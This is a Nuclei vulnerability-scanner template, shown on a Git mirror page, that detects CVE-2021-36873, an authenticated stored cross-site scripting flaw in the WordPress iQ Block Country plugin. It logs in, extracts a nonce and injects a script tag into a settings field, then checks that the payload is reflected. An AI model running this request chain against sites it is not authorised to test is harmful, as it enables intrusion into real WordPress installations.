daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2021/CVE-2021-36873.yaml

65 lines
2.5 KiB
YAML
Raw Blame History

id: CVE-2021-36873
info:
name: iQ Block Country plugin - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in WordPress iQ Block Country plugin (versions <= 1.2.11).
reference:
- https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58
- https://wordpress.org/plugins/iq-block-country/
- https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2021-36873
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-36873
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on
- |
GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- contains(all_headers_4, "text/html")
- status_code_4 == 200
- contains(body_4, 'blockcountry_blockmessage\">test</textarea><script>alert(document.domain)</script>')
- contains(body_4, '<h3>Block type</h3>')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true
Reference in New Issue View Git Blame Copy Permalink